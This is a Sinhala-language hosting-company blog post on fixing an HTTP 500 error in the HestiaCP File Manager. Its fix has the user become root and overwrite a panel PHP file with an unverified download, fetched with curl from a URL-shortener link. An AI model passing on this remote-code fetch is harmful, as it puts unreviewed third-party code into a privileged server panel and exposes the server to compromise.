HestiaCP File Manager හි “HTTP ERROR 500” ගැටළුව විසඳා ගන්නේ කෙසේද?

ඔබගේ VPS එකට අලුතින් HestiaCP ස්ථාපනය කළ පසු හෝ කලින් ස්ථාපනය කර තිබූ පද්ධතියක File Manager වෙත පිවිසීමේදී “This page isn’t working – HTTP ERROR 500” යනුවෙන් දෝෂ පණිවිඩයක් ලැබෙනවාද? මේ දිනවල බොහෝ දෙනෙකුට මුහුණ දීමට සිදු වන මෙම ගැටළුව ඉතා පහසුවෙන් විසඳාගන්නා ආකාරය අද අපි බලමු.

මොකක්ද මේ ප්‍රශ්නය?

HestiaCP අලුතින් Install කළ විට හෝ යාවත්කාලීන වූ විට, සමහර වෙලාවට File Manager එකට අදාළ ‘Session’ ගොනුවල දෝෂයක් ඇති වෙනවා. එවිට https://hostname:8083/fm/ හරහා ලොග් වීමට උත්සාහ කරන විට සර්වර් එක මඟින් Error 500 පණිවිඩය පෙන්වනවා.

විසඳා ගන්නා ආකාරය

ඔබේ VPS එකේ Terminal (SSH) එක හරහා පහත පියවර 4 අනුගමනය කරන්න:

1.මුලින්ම Root බලතල ලබා ගන්න:

sudo -i

2.අදාළ Folder එකට පිවිසෙන්න:

cd /usr/local/hestia/web/fm/backend/Services/Session/Adapters/

3.පැරණි ගොනුව බැකප් එකක් ලෙස තබා ගන්න:

mv SessionStorage.php SessionStorage.php.ori

4.නිවැරදි කළ නව ගොනුව බාගත කරන්න:

curl -fsSLm20 https://7j.gg/fmsesfix -o SessionStorage.php

දැන් ඔබේ Browser එක Refresh කර බලන්න. File Manager එක සාමාන්‍ය පරිදි වැඩ කරනු ඇත!

ස්තුතිය.

ඔබ අඩු මුදලකට Web Hosting, Windows/Linux VPS හෝ E-mail Hosting සොයන්නේ නම්, Divvy Hosting (Pvt) Ltd. වෙතින් ඒවා මිලදී ගත හැකිය. පිවිසෙන්න: https://www.divvyhosting.net

Add a Comment

Your email address will not be published. Required fields are marked *